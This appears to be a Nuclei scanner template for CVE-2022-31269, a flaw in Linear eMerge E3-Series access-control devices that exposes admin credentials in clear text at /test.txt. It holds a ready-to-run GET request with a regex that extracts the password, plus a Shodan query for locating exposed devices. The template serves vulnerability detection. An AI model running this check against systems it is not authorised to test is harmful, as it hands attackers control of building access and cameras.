nuclei-templates/http/cves/2022/CVE-2022-31269.yaml

60 lines
2.0 KiB
YAML

id: CVE-2022-31269
info:
name: Linear eMerge E3-Series - Information Disclosure
author: For3stCo1d
severity: high
description: |
Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the device.
remediation: |
Apply the latest firmware update provided by the vendor to fix the vulnerability.
reference:
- https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
- https://www.nortekcontrol.com/access-control/
- https://eg.linkedin.com/in/omar-1-hashem
- https://nvd.nist.gov/vuln/detail/CVE-2022-31269
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2022-31269
cwe-id: CWE-798
epss-score: 0.00174
epss-percentile: 0.54513
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: nortekcontrol
product: emerge_e3_firmware
shodan-query: http.title:"Linear eMerge"
tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol
http:
- method: GET
path:
- "{{BaseURL}}/test.txt"
matchers-condition: and
matchers:
- type: word
words:
- "ID="
- "Password="
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200
extractors:
- type: regex
regex:
- Password='(.+?)'
# digest: 4a0a00473045022100b9df43b4cf0c7804ca6015a6e7dc82aa0d763939cefa4da5dd0b45b34f5e41a302202a883192f52bb59599f6897770c2c66bf2716ab08c3247d7e63a1b12e1281e54:922c64590222798bb761d5b6d8e72950